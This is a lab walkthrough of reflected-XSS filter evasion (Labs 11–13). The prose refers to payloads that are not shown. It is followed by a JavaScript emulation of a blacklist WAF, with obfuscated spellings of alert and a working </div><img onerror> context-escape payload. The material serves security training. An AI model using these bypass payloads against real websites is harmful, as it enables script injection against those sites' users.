XSS Filtering and Evasion
Labs from RXSS to practice filter evasion
Lab 11
Step 1: Check where our input is reflected
Our canary is reflected inside a <div> tag.
Step 2: Escape from the context
This payload allows me to escape from the context
Step 3: Craft an appropriate payload
However, the following payload did not work. After some trial and error, we noticed that both the alert() function and the <script> tag were filtered by the web application.
We had to find a way to fire the XSS without using <script> or alert().
The payload below fired an XSS.
Lab 12
Step 1: Identify where our input gets reflected
Our input is reflected inside a <div> tag.
Step 2: Try to escape the context
We were able to escape from the context with this payload.
Step 3: Craft an appropriate payload
Next, we used this payload to check whether the alert() function gets sanitized. It did; however, the prompt() function worked to fire the XSS!
Lab 13
Step 1: Identify where our canary gets reflected
Step 2: Try to escape the context
Again, this payload allows us to escape the context. HTML injection is thus possible.
Step 3: Craft the payload
To identify what is being sanitized by the WAF and what is not, change only one parameter at a time in your crafted payload.
After a few attempts, the testers noticed that the img tag was not sanitized. This tag could be used to craft a proper payload.
Now the testers had to identify which functions and attributes can lead to an XSS. Crafting the proper payload takes a lot of trial and error.
After a few attempts, we noticed that prompt(), alert() and confirm() were all blocked by the WAF. However, searching on Google for ways to bypass the alert() filter turned up this payload:
The alert() function is spelled in an unusual way, so it did not get blocked by the WAF but was still correctly interpreted by the browser, which allowed us to fire the XSS!
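As an added, self-contained illustration (not the lab's code or payloads), the following JavaScript emulates the three-step workflow used in Labs 11 to 13: a naive substring blacklist standing in for the WAF, unencoded reflection into a <div>, the canary check for the reflection context, one-change-at-a-time probing of the filter, and several spellings of alert that carry no literal "alert" substring yet resolve to the same function in a browser. The filter rules, the page template, the canary and every payload below are constructed for this example and are assumptions, not the lab's actual WAF behaviour or the payloads from the writeup.

```javascript
// Added example: emulation of a blacklist WAF, a reflected <div> sink and the
// probing / obfuscation steps from the writeup. Everything here is constructed
// for illustration; none of it is the lab's own filter or payload.

// Naive blacklist "WAF": rejects input containing any blocked token
// (case-insensitive substring match). Returns null when blocked, otherwise
// the input unchanged, which the page then reflects without encoding.
function makeFilter(blockedTokens) {
  const tokens = blockedTokens.map((t) => t.toLowerCase());
  return (input) => {
    const lower = input.toLowerCase();
    return tokens.some((t) => lower.includes(t)) ? null : input;
  };
}

// Vulnerable reflection sink: the accepted input lands inside a <div>.
function reflect(input, filter) {
  const accepted = filter(input);
  if (accepted === null) return null; // request dropped by the WAF
  return `<html><body><div class="result">${accepted}</div></body></html>`;
}

// Step 1: send a unique canary and find the tag that encloses it.
const CANARY = 'zq7x9canary'; // constructed canary string
function findContext(filter) {
  const html = reflect(CANARY, filter);
  if (html === null) return 'blocked';
  const idx = html.indexOf(CANARY);
  if (idx === -1) return 'not reflected';
  const before = html.slice(0, idx);
  // Last tag opened before the canary with no other tag in between.
  const m = before.match(/<(\w+)[^>]*>[^<]*$/);
  return m ? m[1] : 'unknown';
}

// Step 3 helper: test candidates one at a time so that exactly one token
// changes per request and the blocked token can be pinpointed.
function probe(candidates, filter) {
  const result = {};
  for (const [label, payload] of Object.entries(candidates)) {
    result[label] = filter(payload) !== null;
  }
  return result;
}

// Spellings of alert that avoid the substring "alert" in the request body.
// They are evaluated below with Function() under a shim that makes
// window/self/top aliases of globalThis, as they are in a browser.
const ALERT_SPELLINGS = {
  unicodeEscape: '\\u0061lert',            // identifier written with a Unicode escape
  bracketConcat: "window['al'+'ert']",     // property lookup with a concatenated name
  base64Name: "self[atob('YWxlcnQ=')]",    // 'YWxlcnQ=' is base64 for 'alert'
  fromCharCode: 'top[String.fromCharCode(97,108,101,114,116)]',
};
for (const name of ['window', 'self', 'top']) {
  if (!(name in globalThis)) globalThis[name] = globalThis;
}
if (typeof globalThis.alert !== 'function') {
  // Node has no alert(); stub it so the spellings have something to resolve to.
  globalThis.alert = function alert(msg) { return `alert:${msg}`; };
}
function resolveSpellings() {
  const out = {};
  for (const [label, expr] of Object.entries(ALERT_SPELLINGS)) {
    out[label] = Function(`return ${expr}`)() === globalThis.alert;
  }
  return out;
}

// Lab-13-style filter: <script>, alert, prompt and confirm are all blocked.
const lab13Filter = makeFilter(['<script', 'alert', 'prompt', 'confirm']);

// Context escape (close the <div>) plus an unfiltered tag and an obfuscated sink.
const FINAL_PAYLOAD = `</div><img src=x onerror="${ALERT_SPELLINGS.unicodeEscape}(1)">`;

const PROBES = {
  script: '<script>1</script>',
  img: '<img src=x>',
  alert: 'alert(1)',
  prompt: 'prompt(1)',
  obfuscated: FINAL_PAYLOAD,
};

console.log('context:', findContext(lab13Filter));
console.log('probe:', probe(PROBES, lab13Filter));
console.log('spellings resolve to alert:', resolveSpellings());
console.log(reflect(FINAL_PAYLOAD, lab13Filter));
```

The blacklist here only matches raw substrings; a real WAF may also URL-decode, lowercase, strip comments or inspect the response, so a spelling that passes this emulation is a candidate to try, not a guaranteed bypass. The onerror handler is not executed in Node; resolveSpellings() only shows that each expression names the same function the browser would call.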